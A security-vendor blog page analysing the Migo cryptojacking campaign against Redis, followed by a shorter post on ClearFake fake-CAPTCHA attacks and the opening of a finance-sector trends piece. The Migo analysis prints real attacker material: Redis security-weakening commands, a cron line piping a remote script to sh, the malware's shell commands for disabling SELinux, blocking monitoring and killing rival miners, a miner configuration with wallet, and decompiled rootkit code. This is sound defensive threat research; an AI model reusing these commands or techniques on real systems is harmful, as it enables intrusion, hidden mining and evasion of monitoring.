Blog
/
/
February 20, 2024

Migo: A Redis Miner with Novel System Weakening Techniques

Migo is a cryptojacking campaign targeting Redis servers, that uses novel system-weakening techniques for initial access. It deploys a Golang ELF binary for cryptocurrency mining, which employs compile-time obfuscation and achieves persistence on Linux hosts. Migo also utilizes a modified user-mode rootkit to hide its processes and on-disk artifacts, complicating analysis and forensics.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
20
Feb 2024

Introduction: Migo

Researchers from Cado Security Labs (now part of Darktrace) encountered a novel malware campaign targeting Redis for initial access. Whilst Redis is no stranger to exploitation by Linux and cloud-focused attackers, this particular campaign involves the use of a number of novel system weakening techniques against the data store itself. 

The malware, named Migo by the developers, aims to compromise Redis servers for the purpose of mining cryptocurrency on the underlying Linux host. 

Summary:

  • New Redis system weakening commands have been observed in the wild
  • The campaign utilizes these commands to exploit Redis to conduct a cryptojacking attack
  • Migo is delivered as a Golang ELF binary, with compile-time obfuscation and the ability to persist on Linux hosts
  • A modified version of a popular user mode rootkit is deployed by the malware to hide processes and on-disk artefacts

Initial access

Cado researchers were first alerted to the Migo campaign after noticing an unusual series of commands targeting a Redis honeypot. 

A malicious node at the IP 103[.]79[.]118[.]221 connected to the honeypot and disabled the following configuration options using the Redis command line interface’s (CLI) config set feature:

  • set protected-mode
  • replica-read-only
  • aof-rewrite-incremental-fsync
  • rdb-save-incremental-fsync

Discussing each of these in turn will shed some light on the threat actor’s motivation for doing so.

Set protected-mode

Protected mode is an operating mode of the Redis server that’s designed as a mitigation for users who may have inadvertently exposed the server to external networks. [1]

Introduced in version 3.2.0, protected mode is engaged when a Redis server has been deployed in the default configuration (i.e. bound to all networking interfaces) without having password authentication enabled. In this mode, the Redis server will only accept connections from the loopback interface, any other connections will receive an error.

Given that the threat actor does not have access to the loopback interface and is instead attempting to connect externally, this command should automatically fail on Redis servers with protected mode enabled. It’s possible the attacker has misunderstood this feature and is trying to issue a number of system weakening commands in an opportunistic manner. 

This feature is disabled in Cado’s honeypot environment, which is why these commands and additional actions on objective succeed.

Redis honeypot sensor
Figure 1: Disable protected mode command observed by a Redis honeypot sensor

Replica-read-only

As the name suggests, the replica-read-only feature configures Redis replicas (exact copies of a master Redis instance) to reject all incoming write commands [2][3]. This configuration parameter is enabled by default, to prevent accidental writes to replicas which could result in the master/replica topology becoming out of sync.

Cado researchers have previously reported on exploitation of the replication feature being used to deliver malicious payloads to Redis instances. [4] The threat actors behind Migo are likely disabling this feature to facilitate future exploitation of the Redis server.

honeypot sensor
Figure 2: Disable aof-rewrite-incremental-fsync command observed by a Redis honeypot sensor

After disabling these configuration parameters, the threat actor used the set command to set the values of two separate Redis keys. One key is assigned a string value corresponding to a malicious threat actor-controlled SSH key, and the other to a Cron job that retrieves the malicious primary payload from Transfer.sh (a relatively uncommon distribution mechanism previously covered by Cado) via Pastebin [5].

The threat actors will then follow-up with a series of commands to change the working directory of Redis itself, before saving the contents of the database. If the working directory is one of the Cron directories, the file will be parsed by crond and executed as a normal Cron job.  This is a common attack pattern against Redis servers and has been previously documented by Cado and others[6][7]

honeypot sensor
Figure 3: Abusing the set command to register a malicious Cron job

As can be seen above, the threat actors create a key named mimigo and use it to register a Cron job that first checks whether a file exists at /tmp/.xxx1. If not, a simple script is retrieved from Pastebin using either curl or wget, and executed directly in memory by piping through sh.

Pastebin script
Figure 4: Pastebin script used to retrieve primary payload from transfer.sh

This in-memory script proceeds to create an empty file at /tmp/.xxx1 (an indicator to the previous stage that the host has been compromised) before retrieving the primary payload from transfer.sh. This payload is saved as /tmp/.migo, before being executed as a background task via nohup.

Primary payload – static properties

The Migo primary payload (/tmp/.migo) is delivered as a statically-linked and stripped UPX-packed ELF, compiled from Go code for the x86_64 architecture. The sample uses vanilla UPX packing (i.e. the UPX header is intact) and can be trivially unpacked using upx -d. 

After unpacking, analysis of the .gopclntab section of the binary highlights the threat actor’s use of a compile-time obfuscator to obscure various strings relating to internal symbols. You might wonder why this is necessary when the binary is already stripped, the answer lies with a feature of the Go programming language named “Program Counter Line Table (pclntab)”. 

In short, the pclntab is a structure located in the .gopclntab section of a Go ELF binary. It can be used to map virtual addresses to symbol names, for the purposes of generating stack traces. This allows reverse engineers the ability to recover symbols from the binary, even in cases where the binary is stripped.  

The developers of Migo have since opted to further protect these symbols by applying additional compile-time obfuscation. This is likely to prevent details of the malware’s capabilities from appearing in stack traces or being easily recovered by reverse engineers.

gopclntab section
Figure 5: Compile-time symbol obfuscation in gopclntab section

With the help of Interactive Disassembler’s (IDA’s) function recognition engine, we can see a number of Go packages (libraries) used by the binary. This includes functions from the OS package, including os/exec (used to run shell commands on Linux hosts), os.GetEnv (to retrieve the value of a specific environment variable) and os.Open to open files. [8, 9]

OS library functions
 Figure 6: Examples of OS library functions identified by IDA

Additionally, the malware includes the net package for performing HTTP requests, the encoding/json package for working with JSON data and the compress/gzip package for handling gzip archives.

Primarily payload – capabilities

Shortly after execution, the Migo binary will consult an infection marker in the form of a file at /tmp/.migo_running. If this file doesn’t exist, the malware creates it, determines its own process ID and writes the file. This tells the threat actors that the machine has been previously compromised, should they encounter it again.

newfstatat(AT_FDCWD, "/tmp/.migo_running", 0xc00010ac68, 0) = -1 ENOENT (No such file or directory) 
    getpid() = 2557 
    openat(AT_FDCWD, "/tmp/.migo_running", O_RDWR|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 6 
    fcntl(6, F_GETFL)  = 0x8002 (flags O_RDWR|O_LARGEFILE) 
    fcntl(6, F_SETFL, O_RDWR|O_NONBLOCK|O_LARGEFILE) = 0 
    epoll_ctl(3, EPOLL_CTL_ADD, 6, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1197473793, u64=9169307754234380289}}) = -1 EPERM (Operation not permitted) 
    fcntl(6, F_GETFL)  = 0x8802 (flags O_RDWR|O_NONBLOCK|O_LARGEFILE) 
    fcntl(6, F_SETFL, O_RDWR|O_LARGEFILE)  = 0 
    write(6, "2557", 4)  = 4 
    close(6) = 0 

Migo proceeds to retrieve the XMRig installer in tar.gz format directly from Github’s CDN, before creating a new directory at /tmp/.migo_worker, where the installer archive is saved as /tmp/.migo_worker/.worker.tar.gz.  Naturally, Migo proceeds to unpack this archive and saves the XMRig binary as /tmp/.migo_worker/.migo_worker. The installation archive contains a default XMRig configuration file, which is rewritten dynamically by the malware and saved to /tmp/.migo_worker/.migo.json.

openat(AT_FDCWD, "/tmp/.migo_worker/config.json", O_RDWR|O_CREAT|O_TRUNC|O_CLOEXEC, 0666) = 9 
    fcntl(9, F_GETFL)  = 0x8002 (flags O_RDWR|O_LARGEFILE) 
    fcntl(9, F_SETFL, O_RDWR|O_NONBLOCK|O_LARGEFILE) = 0 
    epoll_ctl(3, EPOLL_CTL_ADD, 9, {EPOLLIN|EPOLLOUT|EPOLLRDHUP|EPOLLET, {u32=1197473930, u64=9169307754234380426}}) = -1 EPERM (Operation not permitted) 
    fcntl(9, F_GETFL)  = 0x8802 (flags O_RDWR|O_NONBLOCK|O_LARGEFILE) 
    fcntl(9, F_SETFL, O_RDWR|O_LARGEFILE)  = 0 
    write(9, "{\n \"api\": {\n \"id\": null,\n \"worker-id\": null\n },\n \"http\": {\n \"enabled\": false,\n \"host\": \"127.0.0.1\",\n \"port"..., 2346) = 2346 
    newfstatat(AT_FDCWD, "/tmp/.migo_worker/.migo.json", 0xc00010ad38, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory) 
    renameat(AT_FDCWD, "/tmp/.migo_worker/config.json", AT_FDCWD, "/tmp/.migo_worker/.migo.json") = 0 

An example of the XMRig configuration used as part of the campaign (as collected along with the binary payload on the Cado honeypot) can be seen below:

{ 
     "api": { 
     "id": null, 
     "worker-id": null 
     }, 
     "http": { 
     "enabled": false, 
     "host": "127.0.0.1", 
     "port": 0, 
     "access-token": null, 
     "restricted": true 
     }, 
     "autosave": true, 
     "background": false, 
     "colors": true, 
     "title": true, 
     "randomx": { 
     "init": -1, 
     "init-avx2": -1, 
     "mode": "auto", 
     "1gb-pages": false, 
     "rdmsr": true, 
     "wrmsr": true, 
     "cache_qos": false, 
     "numa": true, 
     "scratchpad_prefetch_mode": 1 
     }, 
     "cpu": { 
     "enabled": true, 
     "huge-pages": true, 
     "huge-pages-jit": false, 
     "hw-aes": null, 
     "priority": null, 
     "memory-pool": false, 
     "yield": true, 
     "asm": true, 
     "argon2-impl": null, 
     "argon2": [0, 1], 
     "cn": [ 
     [1, 0], 
     [1, 1] 
     ], 
     "cn-heavy": [ 
     [1, 0], 
     [1, 1] 
     ], 
     "cn-lite": [ 
     [1, 0], 
     [1, 1] 
     ], 
     "cn-pico": [ 
     [2, 0], 
     [2, 1] 
     ], 
     "cn/upx2": [ 
     [2, 0], 
     [2, 1] 
     ], 
     "ghostrider": [ 
     [8, 0], 
     [8, 1] 
     ], 
     "rx": [0, 1], 
     "rx/wow": [0, 1], 
     "cn-lite/0": false, 
     "cn/0": false, 
     "rx/arq": "rx/wow", 
     "rx/keva": "rx/wow" 
     }, 
     "log-file": null, 
     "donate-level": 1, 
     "donate-over-proxy": 1, 
     "pools": [ 
     { 
     "algo": null, 
     "coin": null, 
     "url": "xmrpool.eu:9999", 
     "user": "85RrBGwM4gWhdrnLAcyTwo93WY3M3frr6jJwsZLSWokqB9mChJYZWN91FYykRYJ4BFf8z3m5iaHfwTxtT93txJkGTtN9MFz", 
     "pass": null, 
     "rig-id": null, 
     "nicehash": false, 
     "keepalive": true, 
     "enabled": true, 
     "tls": true, 
     "sni": false, 
     "tls-fingerprint": null, 
     "daemon": false, 
     "socks5": null, 
     "self-select": null, 
     "submit-to-origin": false 
     }, 
     { 
     "algo": null, 
     "coin": null, 
     "url": "pool.hashvault.pro:443", 
     "user": "85RrBGwM4gWhdrnLAcyTwo93WY3M3frr6jJwsZLSWokqB9mChJYZWN91FYykRYJ4BFf8z3m5iaHfwTxtT93txJkGTtN9MFz", 
     "pass": "migo", 
     "rig-id": null, 
     "nicehash": false, 
     "keepalive": true, 
     "enabled": true, 
     "tls": true, 
     "sni": false, 
     "tls-fingerprint": null, 
     "daemon": false, 
     "socks5": null, 
     "self-select": null, 
     "submit-to-origin": false 
     }, 
     { 
     "algo": null, 
     "coin": "XMR", 
     "url": "xmr-jp1.nanopool.org:14433", 
     "user": "85RrBGwM4gWhdrnLAcyTwo93WY3M3frr6jJwsZLSWokqB9mChJYZWN91FYykRYJ4BFf8z3m5iaHfwTxtT93txJkGTtN9MFz", 
     "pass": null, 
     "rig-id": null, 
     "nicehash": false, 
     "keepalive": false, 
     "enabled": true, 
     "tls": true, 
     "sni": false, 
     "tls-fingerprint": null, 
     "daemon": false, 
     "socks5": null, 
     "self-select": null, 
     "submit-to-origin": false 
     }, 
     { 
     "algo": null, 
     "coin": null, 
     "url": "pool.supportxmr.com:443", 
     "user": "85RrBGwM4gWhdrnLAcyTwo93WY3M3frr6jJwsZLSWokqB9mChJYZWN91FYykRYJ4BFf8z3m5iaHfwTxtT93txJkGTtN9MFz", 
     "pass": "migo", 
     "rig-id": null, 
     "nicehash": false, 
     "keepalive": true, 
     "enabled": true, 
     "tls": true, 
     "sni": false, 
     "tls-fingerprint": null, 
     "daemon": false, 
     "socks5": null, 
     "self-select": null, 
     "submit-to-origin": false 
     } 
     ], 
     "retries": 5, 
     "retry-pause": 5, 
     "print-time": 60, 
     "dmi": true, 
     "syslog": false, 
     "tls": { 
     "enabled": false, 
     "protocols": null, 
     "cert": null, 
     "cert_key": null, 
     "ciphers": null, 
     "ciphersuites": null, 
     "dhparam": null 
     }, 
     "dns": { 
     "ipv6": false, 
     "ttl": 30 
     }, 
     "user-agent": null, 
     "verbose": 0, 
     "watch": true, 
     "pause-on-battery": false, 
     "pause-on-active": false 
    } 

With the miner installed and an XMRig configuration set, the malware proceeds to query some information about the system, including the number of logged-in users (via the w binary) and resource limits for users on the system. It also sets the number of Huge Pages available on the system to 128, using the vm.nr_hugepages parameter. These actions are fairly typical for cryptojacking malware. [10]

Interestingly, Migo appears to recursively iterate through files and directories under /etc. The malware will simply read files in these locations and not do anything with the contents. One theory, based on this analysis, is that this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification. It’s also possible the malware is hunting for an artefact specific to the target environment that’s missing from our own analysis environment. However, there was no evidence of this recovered during our analysis.

Once this is complete, the binary is copied to /tmp via the /proc/self/exe symlink ahead of registering persistence, before a series of shell commands are executed. An example of these commands is listed below.

/bin/chmod +x /tmp/.migo 
    /bin/sh -c "echo SELINUX=disabled > /etc/sysconfig/selinux" 
    /bin/sh -c "ls /usr/local/qcloud/YunJing/uninst.sh || ls /var/lib/qcloud/YunJing/uninst.sh" 
    /bin/sh -c "ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh || ls /usr/local/qcloud/stargate/admin/uninstall.sh" 
    /bin/sh -c command -v setenforce 
    /bin/sh -c command -v systemctl 
    /bin/sh -c setenforce 0o 
    go_worker --config /tmp/.migo_worker/.migo.json 
    bash -c "grep -r -l -E '\\b[48][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}\\b' /home" 
    bash -c "grep -r -l -E '\\b[48][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}\\b' /root" 
    bash -c "grep -r -l -E '\\b[48][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}\\b' /tmp" 
    bash -c "systemctl start system-kernel.timer && systemctl enable system-kernel.timer" 
    iptables -A OUTPUT -d 10.148.188.201 -j DROP 
    iptables -A OUTPUT -d 10.148.188.202 -j DROP 
    iptables -A OUTPUT -d 11.149.252.51 -j DROP 
    iptables -A OUTPUT -d 11.149.252.57 -j DROP 
    iptables -A OUTPUT -d 11.149.252.62 -j DROP 
    iptables -A OUTPUT -d 11.177.124.86 -j DROP 
    iptables -A OUTPUT -d 11.177.125.116 -j DROP 
    iptables -A OUTPUT -d 120.232.65.223 -j DROP 
    iptables -A OUTPUT -d 157.148.45.20 -j DROP 
    iptables -A OUTPUT -d 169.254.0.55 -j DROP 
    iptables -A OUTPUT -d 183.2.143.163 -j DROP 
    iptables -C OUTPUT -d 10.148.188.201 -j DROP 
    iptables -C OUTPUT -d 10.148.188.202 -j DROP 
    iptables -C OUTPUT -d 11.149.252.51 -j DROP 
    iptables -C OUTPUT -d 11.149.252.57 -j DROP 
    iptables -C OUTPUT -d 11.149.252.62 -j DROP 
    iptables -C OUTPUT -d 11.177.124.86 -j DROP 
    iptables -C OUTPUT -d 11.177.125.116 -j DROP 
    iptables -C OUTPUT -d 120.232.65.223 -j DROP 
    iptables -C OUTPUT -d 157.148.45.20 -j DROP 
    iptables -C OUTPUT -d 169.254.0.55 -j DROP 
    iptables -C OUTPUT -d 183.2.143.163 -j DROP 
    kill -9 
    ls /usr/local/aegis/aegis_client 
    ls /usr/local/aegis/aegis_update 
    ls /usr/local/cloudmonitor/cloudmonitorCtl.sh 
    ls /usr/local/qcloud/YunJing/uninst.sh 
    ls /usr/local/qcloud/monitor/barad/admin/uninstall.sh 
    ls /usr/local/qcloud/stargate/admin/uninstall.sh 
    ls /var/lib/qcloud/YunJing/uninst.sh 
    lsattr /etc/cron.d/0hourly 
    lsattr /etc/cron.d/raid-check 
    lsattr /etc/cron.d/sysstat 
    lsattr /etc/crontab 
    sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1" 
    sh -c "ps -ef | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep ddgs | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep f2poll | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep hashfish | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep kworkerds | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep t00ls.ru | awk '{print $2}' | xargs kill -9" 
    sh -c "ps -ef | grep -v grep | grep xmrig | awk '{print $2}' | xargs kill -9" 
    systemctl start system-kernel.timer 
    systemctl status firewalld 

In summary, they perform the following actions:

  • Make the copied version of the binary executable, to be executed via a persistence mechanism
  • Disable SELinux and search for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud
  • Execute the miner and pass the dropped configuration into it
  • Configure iptables to drop outbound traffic to specific IPs
  • Kill competing miners and payloads from similar campaigns
  • Register persistence via the systemd timer system-kernel.timer

Note that these actions are consistent with prior mining campaigns targeting East Asian cloud providers analyzed by Cado researchers [11].

Migo will also attempt to prevent outbound traffic to domains belonging to these cloud providers by writing the following lines to /etc/hosts, effectively creating a blackhole for each of these domains. It’s likely that this is to prevent monitoring agents and update software from contacting these domains and triggering any alerts that might be in place. 

This also gives some insight into the infrastructure targeted by the malware, as these domains belong to the same cloud service providers as we discussed previously.

modified contents
Figure 7: Modified contents of /etc/hosts

Persistence

As seen in the commands above, Migo achieves persistence on the target host via the use of a systemd service and associated systemd timer. These are named system-kernel.timer and system-kernel.service respectively. 

The service unit is straightforward, it simply ensures the Migo payload is executable before invoking it. The malware also configures the allowed number of open file descriptors (via the LimitNOFILE parameter) and increases the CPU shares weighting to 1000000, allowing the miner to fully utilize the CPU.

example contents
Figure 8: Example contents of system-kernel.service

This service is controlled by an associated systemd timer, allowing it to be executed 5 seconds after the machine boots, and executed again every five seconds following that [12]. This, in combination with the infection marker mentioned previously, ensures the miner is kept running and can effectively contribute to the mining pool.

Example contents
Figure 9: Example contents of system-kernel.timer

Process hiding

Interestingly, Migo will attempt to hide on-disk artefacts dropped by itself via the use of a user mode rootkit. These artefacts include the contents /tmp/.migo_worker directory, where the malware stores the miner and configuration file, as well as the main payload located at /tmp/.migo. 

To achieve this, the malware updates /etc/ld.so.preload to point at a Linux shared object file located at /usr/local/lib/libsystemd.so, effectively conducting Dynamic Linker hijacking on the Redis host. [13] This shared object is embedded within the Migo primary payload and is extracted at runtime.

 if ( !original_readdir ) 
     { 
     original_readdir = dlsym(0xFFFFFFFFFFFFFFFFLL, "readdir"); 
     if ( !original_readdir ) 
     { 
     v1 = dlerror(); 
     fprintf(stderr, aDlsym_0, v1); 
     } 
     } 
     do 
     v5 = original_readdir(a1); 
     while ( v5 
     && (get_dir_name(a1, s1, 256LL) 
     && !strcmp(s1, "/proc") 
     && get_process_name(v5 + 19, v4) 
     && should_hide_entry(v4, &hiddenProcesses, 3LL) 
     || should_hide_entry(v5 + 19, hiddenFiles, 4LL) 
     || *(v5 + 18) == 4 && should_hide_entry(v5 + 19, &hiddenDirectories, 1LL)) ); 
     return v5; 
    } 

Decompiler output for the process and file hiding functionality in libsystemd.so

libsystemd.so is a process hider based on the open source libprocesshider project, seen frequently in cryptojacking campaigns. [14, 15] With this shared object in place, the malware intercepts invocations of file and process listing tools (ls, ps, top etc) and hides the appropriate lines from the tool’s output.

Examples of hardcoded artefacts
Figure 10: Examples of hardcoded artefacts to hide

Conclusion

Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services. The campaign utilized a number of Redis system weakening commands, in an attempt to disable security features of the data store that may impede their initial access attempts. These commands have not previously been reported in campaigns leveraging Redis for initial access. 

The developers of Migo also appear to be aware of the malware analysis process, taking additional steps to obfuscate symbols and strings found in the pclntab structure that could aid reverse engineering. Even the use of Go to produce a compiled binary as the primary payload, rather than using a series of shell scripts as seen in previous campaigns, suggests that those behind Migo are continuing to hone their techniques and complicate the analysis process. 

In addition, the use of a user mode rootkit could complicate post-incident forensics of hosts compromised by Migo. Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artefacts in addition to the malicious processes themselves.

Indicators of compromise (IoC)

File SHA256

/tmp/.migo (packed) 8cce669c8f9c5304b43d6e91e6332b1cf1113c81f355877dabd25198c3c3f208

/tmp/.migo_worker/.worker.tar.gz c5dc12dbb9bb51ea8acf93d6349d5bc7fe5ee11b68d6371c1bbb098e21d0f685

/tmp/.migo_worker/.migo_json 2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

/tmp/.migo_worker/.migo_worker (XMRig) 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c

system-kernel.service 5dc4a48ebd4f4be7ffcf3d2c1e1ae4f2640e41ca137a58dbb33b0b249b68759e

system-kernel.service 76ecd546374b24443d76c450cb8ed7226db84681ee725482d5b9ff4ce3273c7f

libsystemd.so 32d32bf0be126e685e898d0ac21d93618f95f405c6400e1c8b0a8a72aa753933

IP addresses

103[.]79[.]118[.]221

References

  1. https://redis.io/docs/latest/operate/oss_and_stack/management/security/#protected-mode
  1. https://redis.io/docs/latest/operate/oss_and_stack/management/replication/#read-only-replica
  1. https://redis.io/docs/latest/operate/oss_and_stack/management/replication/
  1. https://www.cadosecurity.com/blog/redis-p2pinfect
  1. https://www.cadosecurity.com/blog/redis-miner-leverages-command-line-file-hosting-service
  1. https://www.cadosecurity.com/blog/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider
  1. https://www.trendmicro.com/en_ph/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
  1. https://pkg.go.dev/os
  1. https://pkg.go.dev/os/exec
  1. https://www.crowdstrike.com/en-us/blog/2021-cryptojacking-trends-and-investigation-recommendations/  
  1. https://www.cadosecurity.com/blog/watchdog-continues-to-target-east-asian-csps
  1. https://www.cadosecurity.com/blog/linux-attack-techniques-dynamic-linker-hijacking-with-ld-preload
  1. https://www.cadosecurity.com/blog/linux-attack-techniques-dynamic-linker-hijacking-with-ld-preload
  1. https://github.com/gianlucaborello/libprocesshider
  1. https://www.cadosecurity.com/blog/abcbot-an-evolution-of-xanthe

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
The Darktrace Community

More in this series

No items found.

Blog

/

Endpoint

/

January 30, 2026

ClearFake: From Fake CAPTCHAs to Blockchain-Driven Payload Retrieval

fake captcha to blockchain driven palyload retrievalDefault blog imageDefault blog image

What is ClearFake?

As threat actors evolve their techniques to exploit victims and breach target networks, the ClearFake campaign has emerged as a significant illustration of this continued adaptation. ClearFake is a campaign observed using a malicious JavaScript framework deployed on compromised websites, impacting sectors such as e‑commerce, travel, and automotive. First identified in mid‑2023, ClearFake is frequently leveraged to socially engineer victims into installing fake web browser updates.

In ClearFake compromises, victims are steered toward compromised WordPress sites, often positioned by attackers through search engine optimization (SEO) poisoning. Once on the site, users are presented with a fake CAPTCHA. This counterfeit challenge is designed to appear legitimate while enabling the execution of malicious code. When a victim interacts with the CAPTCHA, a PowerShell command containing a download string is retrieved and executed.

Attackers commonly abuse the legitimate Microsoft HTML Application Host (MSHTA) in these operations. Recent campaigns have also incorporated Smart Chain endpoints, such as “bsc-dataseed.binance[.]org,” to obtain configuration code. The primary payload delivered through ClearFake is typically an information stealer, such as Lumma Stealer, enabling credential theft, data exfiltration, and persistent access [1].

Darktrace’s Coverage of ClearFake

Darktrace / ENDPOINT first detected activity likely associated with ClearFake on a single device on over the course of one day on November 18, 2025. The system observed the execution of “mshta.exe,” the legitimate Microsoft HTML Application Host utility. It also noted a repeated process command referencing “weiss.neighb0rrol1[.]ru”, indicating suspicious external activity. Subsequent analysis of this endpoint using open‑source intelligence (OSINT) indicated that it was a malicious, domain generation algorithm (DGA) endpoint [2].

The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.
Figure 1: The process line referencing weiss.neighb0rrol1[.]ru, as observed by Darktrace / ENDPOINT.

This activity indicates that mshta.exe was used to contact a remote server, “weiss.neighb0rrol1[.]ru/rpxacc64mshta,” and execute the associated HTA file to initiate the next stage of the attack. OSINT sources have since heavily flagged this server as potentially malicious [3].

The first argument in this process uses the MSHTA utility to execute the HTA file hosted on the remote server. If successful, MSHTA would then run JavaScript or VBScript to launch PowerShell commands used to retrieve malicious payloads, a technique observed in previous ClearFake campaigns. Darktrace also detected unusual activity involving additional Microsoft executables, including “winlogon.exe,” “userinit.exe,” and “explorer.exe.” Although these binaries are legitimate components of the Windows operating system, threat actors can abuse their normal behavior within the Windows login sequence to gain control over user sessions, similar to the misuse of mshta.exe.

EtherHiding cover

Darktrace also identified additional ClearFake‑related activity, specifically a connection to bsc-testnet.drpc[.]org, a legitimate BNB Smart Chain endpoint. This activity was triggered by injected JavaScript on the compromised site www.allstarsuae[.]com, where the script initiated an eth_call POST request to the Smart Chain endpoint.

Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.
Figure 2: Example of a fake CAPTCHA on the compromised site www.allstarsuae[.]com.

EtherHiding is a technique in which threat actors leverage blockchain technology, specifically smart contracts, as part of their malicious infrastructure. Because blockchain is anonymous, decentralized, and highly persistent, it provides threat actors with advantages in evading defensive measures and traditional tracking [4].

In this case, when a user visits a compromised WordPress site, injected base64‑encoded JavaScript retrieved an ABI string, which was then used to load and execute a contract hosted on the BNB Smart Chain.

JavaScript hosted on the compromised site www.allstaruae[.]com.
Figure 3: JavaScript hosted on the compromised site www.allstaruae[.]com.

Conducting malware analysis on this instance, the Base64 decoded into a JavaScript loader. A POST request to bsc-testnet.drpc[.]org was then used to retrieve a hex‑encoded ABI string that loads and executes the contract. The JavaScript also contained hex and Base64‑encoded functions that decoded into additional JavaScript, which attempted to retrieve a payload hosted on GitHub at “github[.]com/PrivateC0de/obf/main/payload.txt.” However, this payload was unavailable at the time of analysis.

Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 4: Darktrace’s detection of the POST request to bsc-testnet.drpc[.]org.
Figure 5: Darktrace’s detection of the executable file and the malicious hostname.

Autonomous Response

As Darktrace’s Autonomous Response capability was enabled on this customer’s network, Darktrace was able to take swift mitigative action to contain the ClearFake‑related activity early, before it could lead to potential payload delivery. The affected device was blocked from making external connections to a number of suspicious endpoints, including 188.114.96[.]6, *.neighb0rrol1[.]ru, and neighb0rrol1[.]ru, ensuring that no further malicious connections could be made and no payloads could be retrieved.

Autonomous Response also acted to prevent the executable mshta.exe from initiating HTA file execution over HTTPS from this endpoint by blocking the attempted connections. Had these files executed successfully, the attack would likely have resulted in the retrieval of an information stealer, such as Lumma Stealer.

Autonomous Response’s intervention against the suspicious connectivity observed.
Figure 6: Autonomous Response’s intervention against the suspicious connectivity observed.

Conclusion

ClearFake continues to be observed across multiple sectors, but Darktrace remains well‑positioned to counter such threats. Because ClearFake’s end goal is often to deliver malware such as information stealers and malware loaders, early disruption is critical to preventing compromise. Users should remain aware of this activity and vigilant regarding fake CAPTCHA pop‑ups. They should also monitor unusual usage of MSHTA and outbound connections to domains that mimic formats such as “bsc-dataseed.binance[.]org” [1].

In this case, Darktrace was able to contain the attack before it could successfully escalate and execute. The attempted execution of HTA files was detected early, allowing Autonomous Response to intervene, stopping the activity from progressing. As soon as the device began communicating with weiss.neighb0rrol1[.]ru, an Autonomous Response inhibitor triggered and interrupted the connections.

As ClearFake continues to rise, users should stay alert to social engineering techniques, including ClickFix, that rely on deceptive security prompts.

Credit to Vivek Rajan (Senior Cyber Analyst) and Tara Gould (Malware Research Lead)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Darktrace Model Detections

Process / New Executable Launched

Endpoint / Anomalous Use of Scripting Process

Endpoint / New Suspicious Executable Launched

Endpoint / Process Connection::Unusual Connection from New Process

Autonomous Response Models

Antigena / Network::Significant Anomaly::Antigena Significant Anomaly from Client Block

List of Indicators of Compromise (IoCs)

  • weiss.neighb0rrol1[.]ru – URL - Malicious Domain
  • 188.114.96[.]6 – IP – Suspicious Domain
  • *.neighb0rrol1[.]ru – URL – Malicious Domain

MITRE Tactics

Initial Access, Drive-by Compromise, T1189

User Execution, Execution, T1204

Software Deployment Tools, Execution and Lateral Movement, T1072

Command and Scripting Interpreter, T1059

System Binary Proxy Execution: MSHTA, T1218.005

References

1.        https://www.kroll.com/en/publications/cyber/rapid-evolution-of-clearfake-delivery

2.        https://www.virustotal.com/gui/domain/weiss.neighb0rrol1.ru

3.        https://www.virustotal.com/gui/file/1f1aabe87e5e93a8fff769bf3614dd559c51c80fc045e11868f3843d9a004d1e/community

4.        https://www.packetlabs.net/posts/etherhiding-a-new-tactic-for-hiding-malware-on-the-blockchain/

Continue reading
About the author
Vivek Rajan
Cyber Analyst

Blog

/

Network

/

January 30, 2026

The State of Cybersecurity in the Finance Sector: Six Trends to Watch

Default blog imageDefault blog image

The evolving cybersecurity threat landscape in finance

The financial sector, encompassing commercial banks, credit unions, financial services providers, and cryptocurrency platforms, faces an increasingly complex and aggressive cyber threat landscape. The financial sector’s reliance on digital infrastructure and its role in managing high-value transactions make it a prime target for both financially motivated and state-sponsored threat actors.

Darktrace’s latest threat research, The State of Cybersecurity in the Finance Sector, draws on a combination of Darktrace telemetry data from real-world customer environments, open-source intelligence, and direct interviews with financial-sector CISOs to provide perspective on how attacks are unfolding and how defenders in the sector need to adapt.  

Six cybersecurity trends in the finance sector for 2026

1. Credential-driven attacks are surging
